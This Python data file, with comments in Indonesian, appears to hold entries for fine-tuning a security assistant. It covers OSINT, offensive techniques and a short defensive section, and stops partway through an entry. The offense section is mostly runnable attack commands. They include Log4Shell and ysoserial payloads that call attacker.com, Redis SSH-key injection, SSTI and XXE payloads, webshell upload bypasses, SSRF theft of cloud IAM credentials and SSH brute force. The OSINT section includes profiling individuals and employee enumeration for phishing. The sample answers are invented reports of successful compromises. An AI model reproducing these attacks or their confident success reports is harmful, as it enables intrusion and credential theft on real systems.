from ds_part1 import _e

# ══════════════════════════════════════════════════════════════════════════════
# DS PART 5 — Tambahan entries semua 15 kategori
# OSINT, Offense, Defense, Scan, Post-Exploit, Wireless, Forensics, IoT, Cloud
# ══════════════════════════════════════════════════════════════════════════════

OSINT_DATA = [
    _e("Gunakan theHarvester untuk kumpulkan semua email dan subdomain dari target.com",
       ["theHarvester adalah OSINT tool untuk email, subdomain, IP dari public sources",
        "gunakan multiple sources: google, bing, linkedin, hunter",
        "output akan berisi emails, hosts, IPs yang bisa digunakan untuk recon lanjutan"],
       ["jalankan theHarvester dengan berbagai sumber",
        "parse output untuk ekstrak emails dan subdomains",
        "validasi hasil dengan dnsx"],
       ["theHarvester -d target.com -b google,bing,linkedin -l 500 -f output.html",
        "theHarvester -d target.com -b hunter,securitytrails -l 200",
        "cat output.xml | grep '<email>' | sed 's/<[^>]*>//g' | sort -u"],
       [("theHarvester", "OSINT email dan subdomain enumeration"),
        ("dnsx", "validasi DNS dari hasil theHarvester")],
       "theHarvester efektif untuk passive recon — tidak ada kontak langsung ke target",
       "target.com emails: admin@, info@, hr@. Subdomains: mail, vpn, dev, staging",
       "analytical",
       "theHarvester -d target.com -b all -l 500. Hasil: 23 emails, 15 subdomains ditemukan."),

    _e("Lakukan OSINT mendalam terhadap seseorang menggunakan nama dan email",
       ["OSINT personal butuh multiple sources: social media, breached databases, public records",
        "theHarvester untuk email verification, maltego untuk relationship mapping",
        "selalu dalam konteks authorized investigation"],
       ["cari di social media", "check breach databases", "map relationships", "compile report"],
       ["theHarvester -d gmail.com -b linkedin -l 100",
        "recon-ng -m recon/profiles-profiles/profiler",
        "shodan search 'hostname:target.com'",
        "amass enum -passive -d target.com"],
       [("theHarvester", "email dan social media OSINT"),
        ("recon-ng", "modular OSINT framework"),
        ("shodan", "internet-connected device search"),
        ("amass", "comprehensive subdomain OSINT")],
       "OSINT personal harus dalam konteks authorized — background check, fraud investigation",
       "OSINT tools: theHarvester (email), recon-ng (modular), shodan (devices), amass (DNS)",
       "professional",
       "OSINT investigation complete. Sources: LinkedIn, Shodan, breach DB. Findings compiled."),

    _e("Gunakan recon-ng untuk automated OSINT reconnaissance",
       ["recon-ng adalah modular framework seperti metasploit tapi untuk OSINT",
        "modules tersedia untuk: DNS, social media, email, geolocation",
        "workspace system memungkinkan organized investigation"],
       ["setup workspace", "load modules", "run reconnaissance", "export results"],
       ["recon-ng",
        "workspaces create target_investigation",
        "modules load recon/domains-hosts/hackertarget",
        "options set SOURCE target.com",
        "run",
        "modules load recon/hosts-hosts/resolve",
        "run",
        "reporting load reporting/html",
        "run"],
       [("recon-ng", "modular OSINT reconnaissance framework")],
       "recon-ng workspace system membantu organize multiple target investigations",
       "recon-ng modules: hackertarget, bing_domain_web, google_site_web, whois_pocs",
       "technical",
       "recon-ng workspace created. Modules: hackertarget, resolve. Found 47 hosts for target.com."),

    _e("Gunakan amass untuk comprehensive subdomain enumeration dan ASN mapping",
       ["amass menggunakan 50+ data sources untuk subdomain discovery",
        "ASN enumeration berguna untuk mapping seluruh IP space milik target",
        "passive mode tidak ada kontak langsung ke target infrastructure"],
       ["passive enum dulu", "active DNS bruteforce", "ASN mapping", "visualize"],
       ["amass enum -passive -d target.com -o passive_subs.txt",
        "amass enum -active -d target.com -brute -o active_subs.txt",
        "amass intel -org 'Target Company' -max-dns-queries 500",
        "amass viz -d3 -d target.com -o viz.html"],
       [("amass", "comprehensive subdomain dan ASN enumeration")],
       "amass passive mode ideal untuk stealth recon. ASN mapping reveals full IP space",
       "amass: passive (50+ sources), active (DNS brute), intel (ASN/org lookup), viz (graph)",
       "analytical",
       "amass found 234 subdomains passive, 89 additional via brute. ASN: AS12345, 3 IP ranges."),

    _e("Gunakan Shodan untuk menemukan internet-exposed assets milik target",
       ["Shodan adalah search engine untuk internet-connected devices",
        "query berdasarkan: hostname, org, IP range, port, teknologi",
        "berguna untuk menemukan shadow IT dan exposed services"],
       ["query by org name", "search by IP range", "find exposed services", "check vulnerabilities"],
       ["shodan search 'org:Target Company' --fields ip_str,port,hostnames",
        "shodan search 'hostname:target.com' --fields ip_str,port,product",
        "shodan search 'net:203.0.113.0/24'",
        "shodan search 'org:Target' port:22,3389,5900"],
       [("shodan", "internet-exposed asset discovery")],
       "Shodan reveals exposed services the org might not know about — shadow IT risk",
       "Shodan queries: org:, hostname:, net:, port:, product:, vuln:CVE-xxxx",
       "professional",
       "Shodan found: 3 RDP exposed (port 3389), 1 Elasticsearch unauthenticated, 2 old Apache."),

    _e("Lakukan email OSINT dan validasi untuk phishing assessment",
       ["email harvesting adalah langkah penting sebelum phishing simulation",
        "validate email format dan MX records sebelum campaign",
        "tools: theHarvester, hunter.io, email-validator"],
       ["harvest emails", "validate format", "check MX records", "categorize by department"],
       ["theHarvester -d target.com -b google,linkedin,hunter -l 500",
        "cat emails.txt | while read e; do host $(echo $e | cut -d@ -f2); done",
        "smtp-user-enum -M VRFY -U emails.txt -t mail.target.com"],
       [("theHarvester", "email harvesting"),
        ("smtp-user-enum", "SMTP user enumeration")],
       "Email validation sebelum phishing simulation mencegah bounce dan deteksi",
       "Email patterns: firstname.lastname@, first.l@, flastname@. Validate dengan VRFY/EXPN",
       "technical",
       "Harvested 89 emails. Validated 67 active via SMTP VRFY. Patterns: f.lastname@target.com"),

    _e("Gunakan Maltego untuk visualisasi relationship mapping target",
       ["Maltego adalah visual OSINT tool untuk relationship mapping",
        "entities: person, company, domain, IP, email, phone",
        "transforms: koneksi antar entities dari berbagai data sources"],
       ["create entities", "run transforms", "analyze graph", "export findings"],
       ["maltego",
        "# Create domain entity: target.com",
        "# Run transform: To DNS Name (All)",
        "# Run transform: To IP Address",
        "# Run transform: To Email Address (PGP)",
        "# Analyze relationship graph"],
       [("maltego", "visual OSINT relationship mapping")],
       "Maltego graph visualization memudahkan identifikasi relationships yang tidak obvious",
       "Maltego transforms: DNS, Whois, Shodan, LinkedIn, PGP, VirusTotal integration",
       "analytical",
       "Maltego graph: target.com → 23 subdomains → 5 IP ranges → 3 hosting providers → 47 emails"),

    _e("Gunakan Google Dorks untuk menemukan sensitive information yang terexpose",
       ["Google Dorks menggunakan advanced search operators untuk menemukan exposed data",
        "operator: site:, filetype:, inurl:, intitle:, intext:",
        "berguna untuk menemukan: exposed files, login pages, vulnerable params"],
       ["craft targeted dorks", "search for sensitive files", "find admin panels", "check for leaks"],
       ["site:target.com filetype:pdf confidential",
        "site:target.com filetype:sql OR filetype:bak OR filetype:log",
        "site:target.com inurl:admin OR inurl:login OR inurl:dashboard",
        "site:target.com intext:password OR intext:username OR intext:api_key",
        "site:github.com target.com password OR secret OR api_key"],
       [("google_dorks", "advanced Google search for OSINT")],
       "Google Dorks passive — tidak ada kontak ke target. Berguna untuk quick info gathering",
       "Dorks: filetype:sql, filetype:env, inurl:admin, intitle:index.of, site:github.com target",
       "concise",
       "Google Dorks found: 3 PDF with internal data, 1 backup file exposed, GitHub repo with API key"),

    _e("Lakukan OSINT pada infrastruktur cloud target menggunakan public sources",
       ["cloud OSINT: mencari exposed buckets, public repos, job postings untuk tech stack",
        "job postings reveal technology stack yang digunakan target",
        "GitHub/GitLab search untuk leaked credentials"],
       ["search job postings", "enumerate GitHub", "check S3 buckets", "check DNS for cloud hints"],
       ["# GitHub search untuk leaked creds",
        "github.com/search?q=target.com+password&type=code",
        "# S3 bucket enumeration",
        "aws s3 ls s3://target-backup --no-sign-request",
        "# DNS untuk cloud hints",
        "dig target.com CNAME | grep -E 'amazonaws|azure|gcp'",
        "# Certspotter untuk subdomains",
        "curl https://api.certspotter.com/v1/issuances?domain=target.com"],
       [("github_search", "leaked credential search"),
        ("aws_cli", "public S3 bucket enumeration"),
        ("certspotter", "certificate transparency OSINT")],
       "Cloud OSINT via public sources sering reveal lebih banyak dari active scanning",
       "Cloud hints in DNS: amazonaws.com CNAME, azurewebsites.net, appspot.com reveals CSP",
       "professional",
       "Cloud OSINT: GitHub found old API key (check if revoked), 2 public S3 buckets, AWS stack confirmed"),

    _e("Gunakan OSINT untuk investigasi domain baru yang mencurigakan",
       ["domain baru dengan nama mirip target bisa indikasi phishing campaign",
        "check: WHOIS, DNS, certificate transparency, similarity score",
        "tools: dnstwist, certspotter, whois"],
       ["typosquat detection", "WHOIS lookup", "check cert transparency", "calculate similarity"],
       ["dnstwist --registered target.com",
        "whois suspicious-target.com",
        "curl https://crt.sh/?q=%.target.com&output=json | jq '.[].name_value'",
        "dig suspicious-target.com MX",
        "curl -s https://urlscan.io/api/v1/search/?q=domain:suspicious-target.com"],
       [("dnstwist", "typosquatting domain detection"),
        ("whois", "domain registration lookup"),
        ("crtsh", "certificate transparency search")],
       "Typosquatting detection penting untuk brand protection dan phishing prevention",
       "dnstwist finds: homoglyphs, typos, bitsquatting variants. Check MX for phishing infra",
       "analytical",
       "dnstwist found 12 registered variants. 3 have MX records = active phishing infrastructure"),

    _e("Lakukan OSINT geolocation dan physical security intelligence",
       ["geolocation OSINT: IP location, photo metadata, check-ins, satellite imagery",
        "berguna untuk physical pentest planning dan threat intelligence",
        "sources: Google Maps, Shodan, social media, EXIF data"],
       ["IP geolocation", "image EXIF analysis", "social media location data", "satellite imagery"],
       ["curl https://ipapi.co/203.0.113.1/json/",
        "exiftool photo.jpg | grep -E 'GPS|Location'",
        "shodan search 'city:Jakarta org:Target'",
        "# Google Maps Street View untuk physical layout"],
       [("exiftool", "EXIF metadata extraction dari photos"),
        ("shodan", "IP geolocation dan device info")],
       "Geolocation OSINT berguna untuk physical pentest planning — entry points, cameras",
       "EXIF GPS coords dari social media photos bisa reveal physical location target",
       "professional",
       "Geolocation OSINT: HQ at Jakarta, secondary office Bandung confirmed via social media photos EXIF"),

    _e("Gunakan Shodan Dorks untuk menemukan vulnerable IoT dan industrial systems",
       ["Shodan memiliki specialized dorks untuk ICS/SCADA, cameras, routers",
        "berguna untuk IoT security assessment dan exposed industrial systems",
        "selalu dalam konteks authorized assessment"],
       ["search industrial systems", "find exposed cameras", "check default credentials", "assess risk"],
       ["shodan search 'port:502 modbus'",
        "shodan search 'port:47808 bacnet'",
        "shodan search 'Server: yawcam' country:ID",
        "shodan search 'default password' port:23",
        "shodan search 'org:Target' port:161 snmp"],
       [("shodan", "IoT dan industrial system discovery")],
       "Shodan reveals exposed ICS/SCADA systems yang sangat berbahaya jika tidak secured",
       "Shodan IoT dorks: port:502 (Modbus), port:47808 (BACnet), port:44818 (EtherNet/IP)",
       "technical",
       "Shodan found: 2 Modbus devices exposed, 1 IP camera with default pass, 3 SNMP v1 devices"),

    _e("Lakukan LinkedIn OSINT untuk employee enumeration dan org chart mapping",
       ["LinkedIn adalah sumber data karyawan yang sangat kaya untuk social engineering prep",
        "tools: theHarvester dengan linkedin source, linkedin2username",
        "data yang dicari: names, emails, roles, technologies used"],
       ["enumerate employees", "map org structure", "identify targets", "generate email patterns"],
       ["theHarvester -d target.com -b linkedin -l 500",
        "linkedin2username -c 'Target Company' -n 100",
        "# Manual: search 'Target Company' employees di LinkedIn",
        "# Note: IT, Finance, HR, Executive roles sebagai target"],
       [("theHarvester", "LinkedIn employee enumeration"),
        ("linkedin2username", "generate username list dari LinkedIn")],
       "LinkedIn OSINT reveals org structure, technologies (dari job postings), key targets",
       "LinkedIn targets: IT admins (have access), executives (whaling), HR (credential reset)",
       "analytical",
       "LinkedIn OSINT: 234 employees found. IT team: 12 people. Email pattern: f.lastname@target.com"),

    _e("Gunakan Certificate Transparency untuk subdomain discovery",
       ["Certificate Transparency logs adalah public record semua SSL certificates",
        "setiap subdomain yang pernah ada SSL cert-nya akan muncul di CT logs",
        "passive, tidak ada kontak ke target"],
       ["query CT logs", "extract subdomains", "validate active ones", "check for wildcards"],
       ["curl -s 'https://crt.sh/?q=%.target.com&output=json' | jq -r '.[].name_value' | sort -u",
        "curl -s 'https://api.certspotter.com/v1/issuances?domain=target.com&include_subdomains=true' | jq -r '.[].dns_names[]'",
        "cat ct_subs.txt | dnsx -silent -o resolved_ct.txt"],
       [("crtsh", "certificate transparency subdomain discovery"),
        ("certspotter", "alternative CT log search"),
        ("dnsx", "validate discovered subdomains")],
       "CT logs sangat efektif — bisa temukan subdomains yang tidak muncul di DNS bruteforce",
       "crt.sh query: %.target.com untuk wildcard. Returns: all certs ever issued for domain",
       "technical",
       "CT logs found 156 unique subdomains. 23 not found via brute force. 67 currently active."),

    _e("Lakukan OSINT dark web monitoring untuk data breach detection",
       ["dark web monitoring untuk deteksi leaked credentials dan data breaches",
        "sources: HaveIBeenPwned API, DeHashed, breach compilation databases",
        "berguna untuk proactive credential monitoring"],
       ["check breach databases", "validate findings", "notify affected users", "force password reset"],
       ["curl -s 'https://haveibeenpwned.com/api/v3/breachedaccount/user@target.com' -H 'hibp-api-key: KEY'",
        "# Check domain-wide breaches",
        "curl -s 'https://haveibeenpwned.com/api/v3/breaches' | jq '.[] | select(.Domain==\"target.com\")'",
        "# DeHashed API",
        "curl 'https://api.dehashed.com/search?query=domain:target.com' -H 'Authorization: Basic BASE64'"],
       [("haveibeenpwned", "breach database check"),
        ("dehashed", "comprehensive breach search")],
       "Dark web monitoring adalah proactive defense — temukan breach sebelum attacker exploit",
       "HIBP API: check email per-account atau domain-wide. DeHashed: more comprehensive data",
       "professional",
       "Breach monitoring: 47 target.com emails in breaches. Most recent: RockYou2021. Action: force reset"),
]

OFFENSE_DATA = [
    _e("Eksploitasi CVE-2021-44228 Log4Shell pada server yang vulnerable",
       ["Log4Shell adalah RCE via JNDI injection di Log4j library",
        "check versi Log4j: 2.0-beta9 sampai 2.14.1 vulnerable",
        "payload dikirim di user-controlled input: User-Agent, X-Forwarded-For, username"],
       ["identify vulnerable endpoint", "setup JNDI server", "send payload", "catch callback"],
       ["# Check vulnerability",
        "curl -H 'X-Api-Version: ${jndi:ldap://attacker.com/a}' https://target.com/api",
        "# Setup JNDI exploit server",
        "java -jar JNDI-Exploit-Kit.jar -C 'id' -A attacker.com",
        "# Send payload",
        "curl -H 'User-Agent: ${jndi:ldap://attacker.com:1389/Basic/Command/Base64/aWQ=}' https://target.com"],
       [("log4shell_scanner", "detect Log4Shell vulnerability"),
        ("jndi_exploit_kit", "JNDI exploit server untuk Log4Shell")],
       "Log4Shell sangat kritikal — check semua Java applications. Patch ke Log4j 2.17.1+",
       "Log4Shell CVE-2021-44228 CVSS 10.0. Affects Log4j 2.0b9-2.14.1. Patch: 2.17.1+",
       "technical",
       "Log4Shell confirmed via callback. RCE achieved as 'tomcat' user. Escalate privileges next."),

    _e("Eksploitasi misconfigured Redis server yang exposed ke internet",
       ["Redis tanpa auth yang exposed ke internet = easy RCE via config set",
        "attack: set dir ke ~/.ssh, set dbfilename authorized_keys, save SSH key",
        "juga bisa: crontab injection untuk reverse shell"],
       ["connect to Redis", "check no auth", "write SSH key or crontab", "get shell"],
       ["redis-cli -h target.com -p 6379 ping",
        "redis-cli -h target.com -p 6379 config get dir",
        "redis-cli -h target.com -p 6379 config set dir /root/.ssh",
        "redis-cli -h target.com -p 6379 config set dbfilename authorized_keys",
        "redis-cli -h target.com -p 6379 set payload '\\n\\nssh-rsa AAAA...\\n\\n'",
        "redis-cli -h target.com -p 6379 save"],
       [("redis_cli", "Redis client untuk exploitation")],
       "Exposed Redis = critical. SSH key injection atau crontab shell. Always check port 6379",
       "Redis attack vectors: SSH key, crontab, webshell via web root path, Lua script RCE",
       "technical",
       "Redis unauthenticated on port 6379. SSH key injected to /root/.ssh/authorized_keys. Root shell obtained."),

    _e("Lakukan SQL injection time-based blind pada parameter yang tidak menampilkan error",
       ["blind SQLi tidak menampilkan error — deteksi via timing atau boolean response",
        "time-based: inject SLEEP() atau WAITFOR DELAY",
        "sqlmap dengan level dan risk tinggi untuk blind detection"],
       ["identify injection point", "test boolean response", "time-based detection", "extract data"],
       ["# Manual test time-based",
        "curl 'https://target.com/product?id=1 AND SLEEP(5)--' -v",
        "# Automated sqlmap",
        "sqlmap -u 'https://target.com/product?id=1' --technique=T --level=5 --risk=3 --dbs",
        "sqlmap -u 'https://target.com/product?id=1' --technique=BT --dump -T users --batch"],
       [("sqlmap", "automated SQL injection"),
        ("burpsuite", "manual injection testing")],
       "Time-based blind SQLi lambat tapi reliable. Gunakan --threads untuk speed up",
       "SQLi techniques: E(rror), U(nion), B(oolean), T(ime), S(tacked). Time-based paling stealth",
       "analytical",
       "Time-based SQLi confirmed with 5s delay. sqlmap extracted 3 databases. Users table: 1,247 records."),

    _e("Eksploitasi Server-Side Template Injection (SSTI) pada web application",
       ["SSTI terjadi ketika user input dirender langsung oleh template engine",
        "payloads berbeda per engine: Jinja2, Twig, Freemarker, Velocity",
        "impact: RCE via template engine sandbox escape"],
       ["detect template engine", "test SSTI payload", "identify engine", "escalate to RCE"],
       ["# Detection payload",
        "curl 'https://target.com/page?name={{7*7}}'  # Jinja2/Twig: 49",
        "curl 'https://target.com/page?name=${7*7}'   # Freemarker: 49",
        "# Jinja2 RCE",
        "curl 'https://target.com/page?name={{config.__class__.__init__.__globals__[\"os\"].popen(\"id\").read()}}'",
        "# Twig RCE",
        "curl 'https://target.com/page?name={{_self.env.registerUndefinedFilterCallback(\"exec\")}}{{_self.env.getFilter(\"id\")}}'"],
       [("burpsuite", "SSTI payload injection"),
        ("tplmap", "automated SSTI detection dan exploitation")],
       "SSTI = RCE jika template engine powerful. Detect dengan {{7*7}} atau ${7*7}",
       "SSTI engines: Jinja2 (Python), Twig (PHP), Freemarker (Java), Pebble (Java)",
       "technical",
       "SSTI confirmed: {{7*7}}=49, engine: Jinja2. RCE achieved via __globals__ os.popen. User: www-data"),

    _e("Eksploitasi XML External Entity (XXE) untuk file read dan SSRF",
       ["XXE terjadi ketika XML parser memproses external entity references",
        "impact: file read, SSRF, denial of service, data exfiltration",
        "test di semua endpoint yang menerima XML input"],
       ["identify XML endpoint", "inject DOCTYPE", "read local files", "pivot to SSRF"],
       ["# Basic XXE file read",
        "curl -X POST https://target.com/api/parse -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><root>&xxe;</root>'",
        "# XXE untuk SSRF ke cloud metadata",
        "# entity SYSTEM \"http://169.254.169.254/latest/meta-data/\"",
        "# Blind XXE via DNS callback",
        "# entity SYSTEM \"http://attacker.com/$(cat /etc/hostname)\""],
       [("burpsuite", "XXE payload injection"),
        ("xxeinjector", "automated XXE testing")],
       "XXE common di Java apps (SAXParser, DocumentBuilder). Check Content-Type: application/xml",
       "XXE mitigations: disable external entities, DTD processing, use JSON instead of XML",
       "technical",
       "XXE confirmed. /etc/passwd readable. /etc/shadow not readable (permission). SSRF to metadata works."),

    _e("Eksploitasi insecure file upload untuk mendapatkan web shell",
       ["file upload vulnerability = upload malicious file yang bisa dieksekusi server",
        "bypass teknik: MIME type manipulation, extension bypass, null byte",
        "target: .php, .jsp, .aspx, .php5, .phtml"],
       ["identify upload endpoint", "test file type restrictions", "bypass restrictions", "access shell"],
       ["# Test basic upload",
        "curl -F 'file=@shell.php' https://target.com/upload",
        "# Bypass MIME check",
        "curl -F 'file=@shell.php;type=image/jpeg' https://target.com/upload",
        "# Double extension bypass",
        "mv shell.php shell.php.jpg && curl -F 'file=@shell.php.jpg' https://target.com/upload",
        "# Null byte bypass (older PHP)",
        "curl -F 'file=@shell.php%00.jpg' https://target.com/upload",
        "# Access uploaded shell",
        "curl https://target.com/uploads/shell.php?cmd=id"],
       [("burpsuite", "file upload manipulation"),
        ("weevely", "web shell generation dan management")],
       "File upload bypass: MIME type client-side only, double extension, null byte, .htaccess",
       "Web shell locations: uploads/, images/, avatars/, media/. Check .htaccess untuk execution",
       "analytical",
       "File upload bypass: MIME type was client-side only. Uploaded shell.php as image/jpeg. RCE confirmed."),

    _e("Eksploitasi Path Traversal untuk membaca file sensitif server",
       ["path traversal = manipulasi file path untuk akses diluar intended directory",
        "sequence: ../, ..\\, %2e%2e%2f, ..%252f (double encoded)",
        "target files: /etc/passwd, /etc/shadow, app configs, private keys"],
       ["identify file parameter", "test traversal sequences", "read sensitive files", "escalate"],
       ["# Basic test",
        "curl 'https://target.com/download?file=../../../etc/passwd'",
        "# URL encoded",
        "curl 'https://target.com/download?file=..%2F..%2F..%2Fetc%2Fpasswd'",
        "# Double encoded",
        "curl 'https://target.com/download?file=..%252F..%252F..%252Fetc%252Fpasswd'",
        "# Windows path",
        "curl 'https://target.com/download?file=..\\..\\..\\windows\\win.ini'"],
       [("burpsuite", "path traversal testing"),
        ("dotdotpwn", "automated path traversal fuzzer")],
       "Path traversal: test multiple encoding. Read /etc/passwd dulu, lalu escalate ke config files",
       "Sensitive targets: /etc/shadow, /var/www/config.php, .env, private_key.pem, web.config",
       "technical",
       "Path traversal: ../../../etc/passwd readable. Config.php found with DB credentials. SSH key exposed."),

    _e("Eksploitasi SSRF untuk akses internal network dan cloud metadata",
       ["SSRF = Server-Side Request Forgery, server membuat request ke URL yang kita kontrol",
        "target: internal services, cloud metadata, localhost services",
        "bypass: DNS rebinding, alternate IP formats, redirect chains"],
       ["find SSRF parameter", "test internal URLs", "access cloud metadata", "pivot to internal"],
       ["# Basic SSRF test",
        "curl 'https://target.com/fetch?url=http://attacker.com/ssrf_test'",
        "# Internal service access",
        "curl 'https://target.com/fetch?url=http://localhost:8080/admin'",
        "curl 'https://target.com/fetch?url=http://192.168.1.1/router'",
        "# AWS metadata",
        "curl 'https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/'",
        "curl 'https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/'",
        "# GCP metadata",
        "curl 'https://target.com/fetch?url=http://metadata.google.internal/computeMetadata/v1/' -H 'Metadata-Flavor: Google'"],
       [("burpsuite", "SSRF parameter testing"),
        ("ssrfmap", "automated SSRF exploitation")],
       "SSRF → cloud metadata = critical. AWS IAM credentials dari metadata = account compromise",
       "SSRF endpoints: url=, path=, dest=, redirect=, uri=, proxy=, fetch=, load=",
       "professional",
       "SSRF confirmed. AWS metadata accessible. IAM role: ec2-role-prod. Credentials extracted for pivot."),

    _e("Lakukan brute force attack pada SSH dengan custom wordlist",
       ["SSH brute force dengan hydra atau medusa",
        "gunakan targeted wordlist: username dari OSINT, password dari common lists",
        "rate limit dengan delay untuk avoid lockout dan detection"],
       ["enumerate usernames", "create targeted wordlist", "brute force dengan delay", "use valid creds"],
       ["# Username enumeration via timing attack",
        "ssh-user-enum.py target.com users.txt",
        "# Hydra SSH brute force",
        "hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://target.com -t 4 -W 3",
        "# Medusa (alternative)",
        "medusa -h target.com -U users.txt -P passwords.txt -M ssh -t 2",
        "# Single user, many passwords",
        "hydra -l admin -P custom_wordlist.txt ssh://target.com:22 -t 4"],
       [("hydra", "SSH brute force"),
        ("medusa", "alternative brute force tool")],
       "SSH brute force: pakai -t 4 atau kurang untuk avoid detection. Custom wordlist lebih efektif",
       "SSH brute targets: root, admin, ubuntu, ec2-user, kali. Common passes: password, 123456, target name",
       "technical",
       "SSH brute force: hydra found admin:Summer2024! after 2847 attempts. SSH access established."),

    _e("Eksploitasi WordPress vulnerabilities menggunakan WPScan",
       ["WordPress adalah CMS paling banyak digunakan dan paling banyak dieksploitasi",
        "WPScan enumerate: users, plugins, themes, vulnerabilities",
        "common vulns: outdated plugins, weak credentials, xmlrpc brute force"],
       ["enumerate WP installation", "find vulnerable plugins", "brute admin credentials", "exploit"],
       ["# WPScan enumeration",
        "wpscan --url https://target.com/blog --enumerate u,p,t,vp,vt",
        "# Brute force admin",
        "wpscan --url https://target.com/blog --usernames admin --passwords rockyou.txt",
        "# XMLRPC brute force (faster)",
        "wpscan --url https://target.com/blog --password-attack xmlrpc --usernames admin -P rockyou.txt",
        "# Check specific CVEs",
        "wpscan --url https://target.com/blog --api-token TOKEN --plugins-detection aggressive"],
       [("wpscan", "WordPress security scanner dan exploitation")],
       "WPScan API token diperlukan untuk CVE database. xmlrpc brute force jauh lebih cepat",
       "WP attack surface: wp-login.php, xmlrpc.php, REST API (/wp-json/), plugin vulnerabilities",
       "analytical",
       "WPScan found: admin user, 3 vulnerable plugins (File Manager RCE, Contact Form SQLi). Admin cracked."),

    _e("Eksploitasi deserialization vulnerability di Java application",
       ["Java deserialization vulnerability terjadi saat ObjectInputStream.readObject() digunakan",
        "signature: AC ED 00 05 di awal data (Java serialized object bytes)",
        "tools: ysoserial untuk generate gadget chain payloads"],
       ["identify serialized objects", "determine classpath", "generate payload", "deliver exploit"],
       ["# Detect Java serialized objects",
        "# Look for base64: rO0AB (decodes to AC ED 00 05)",
        "echo 'rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0...' | base64 -d | xxd | head -2",
        "# Generate payload dengan ysoserial",
        "java -jar ysoserial.jar CommonsCollections6 'id' > payload.ser",
        "java -jar ysoserial.jar Spring1 'curl attacker.com/$(id)' > payload.ser",
        "# Base64 encode payload",
        "base64 -w 0 payload.ser > payload.b64",
        "# Send payload",
        "curl -X POST https://target.com/api/deserialize -d @payload.b64"],
       [("ysoserial", "Java deserialization gadget chain generator")],
       "Java deserialization: check base64 rO0AB pattern. Try multiple gadget chains (CC1-6, Spring, Groovy)",
       "Ysoserial gadgets: CommonsCollections1-6, Spring1-2, Groovy1, JRMPClient, URLDNS (detect)",
       "technical",
       "Java deserialization RCE: rO0AB in viewState. CommonsCollections6 worked. RCE as tomcat user."),

    _e("Eksploitasi HTTP Request Smuggling untuk bypass security controls",
       ["HTTP Request Smuggling terjadi ketika front-end dan back-end parse request berbeda",
        "CL.TE: front-end pakai Content-Length, back-end pakai Transfer-Encoding",
        "TE.CL: sebaliknya. TE.TE: keduanya TE tapi bisa diobfuscate"],
       ["detect smuggling vulnerability", "determine type (CL.TE or TE.CL)", "craft exploit", "bypass controls"],
       ["# CL.TE detection - timing based",
        "# Send request dengan Content-Length dan Transfer-Encoding",
        "# Jika delay terjadi: vulnerable",
        "# CL.TE smuggle ke admin",
        "# POST / HTTP/1.1",
        "# Content-Length: 130",
        "# Transfer-Encoding: chunked",
        "# 0\\r\\n\\r\\n",
        "# GET /admin HTTP/1.1",
        "# Host: localhost",
        "# Use Burp HTTP Request Smuggler extension"],
       [("burpsuite", "HTTP request smuggling testing"),
        ("smuggler_py", "automated request smuggling detection")],
       "Request smuggling detection sulit secara manual — gunakan Burp extension HTTP Request Smuggler",
       "Smuggling impact: bypass security controls, capture victim requests, admin access, cache poisoning",
       "analytical",
       "CL.TE smuggling confirmed. Admin panel accessed. Victim request captured including session token."),

    _e("Eksploitasi OAuth 2.0 misconfiguration untuk account takeover",
       ["OAuth ATO via: open redirect, state param bypass, token leakage",
        "redirect_uri tidak divalidasi strict = code theft via open redirect",
        "implicit flow token leakage via Referer header"],
       ["analyze OAuth flow", "test redirect_uri", "find open redirect", "steal authorization code"],
       ["# Test redirect_uri validation",
        "# Try: ?redirect_uri=https://attacker.com",
        "# Try: ?redirect_uri=https://target.com.attacker.com",
        "# Try: ?redirect_uri=https://target.com/callback/../../../attacker.com",
        "# Find open redirect on allowed domain",
        "# https://target.com/redirect?url=https://attacker.com",
        "# Steal code via open redirect",
        "# https://auth.target.com/oauth?redirect_uri=https://target.com/redirect?url=https://attacker.com"],
       [("burpsuite", "OAuth flow interception dan manipulation")],
       "OAuth ATO: find open redirect on allowed domain, chain dengan redirect_uri untuk code theft",
       "OAuth test: state parameter CSRF, redirect_uri wildcard, token in URL (Referer leak)",
       "professional",
       "OAuth ATO: redirect_uri accepts target.com/*. Open redirect at /redirect. Auth code stolen. Full ATO."),

    _e("Eksploitasi GraphQL untuk data exfiltration dan authorization bypass",
       ["GraphQL introspection reveals semua queries, mutations, types",
        "common vulns: introspection enabled, no auth on mutations, batching attacks",
        "tools: graphql-voyager untuk visualisasi, clairvoyance untuk blind enumeration"],
       ["enable introspection", "map schema", "find sensitive operations", "bypass authorization"],
       ["# Introspection query",
        "curl -X POST https://target.com/graphql -H 'Content-Type: application/json' -d '{\"query\":\"{__schema{types{name fields{name}}}}\"}' ",
        "# Find all queries",
        "curl -X POST https://target.com/graphql -d '{\"query\":\"{__schema{queryType{fields{name}}}}\"}' ",
        "# Test admin mutations",
        "curl -X POST https://target.com/graphql -d '{\"query\":\"mutation{deleteUser(id:1){success}}\"}'",
        "# Batching attack (bypass rate limit)",
        "curl -X POST https://target.com/graphql -d '[{\"query\":\"...\"},...]'"],
       [("burpsuite", "GraphQL query interception"),
        ("graphqlmap", "automated GraphQL vulnerability scanner")],
       "GraphQL: disable introspection in prod, implement depth limiting, add auth to all resolvers",
       "GraphQL attacks: introspection, IDOR via ID, unauthorized mutations, DoS via deep queries",
       "technical",
       "GraphQL introspection exposed admin mutations. deleteUser dan massReset accessible without auth."),
]

DEFENSE_DATA = [
    _e("Setup SIEM dengan Wazuh untuk real-time security monitoring",
       ["Wazuh adalah open-source SIEM/XDR platform",
        "components: Wazuh Manager, Wazuh Agent, OpenSearch/Elasticsearch, Kibana",
        "covers: log analysis, intrusion detection, vulnerability assessment, compliance"],
       ["install Wazuh manager", "deploy agents", "configure rules", "setup dashboards"],
       ["# Install Wazuh manager",
        "curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh",
        "bash wazuh-install.sh -a",
        "# Deploy agent di host",
        "WAZUH_MANAGER='10.0.0.1' WAZUH_AGENT_NAME='web-server' apt install wazuh-agent",
        "systemctl start wazuh-agent",
        "# Check agent status",
        "wazuh-control status",
        "# Test rule",
        "logger -n 10.0.0.1 -P 514 'Failed password for root'"],
       [("wazuh", "SIEM/XDR platform untuk security monitoring")],
       "Wazuh all-in-one installer mudah untuk lab setup. Production butuh clustered setup",
       "Wazuh components: manager (analysis), agent (collect), indexer (store), dashboard (visualize)",
       "professional",
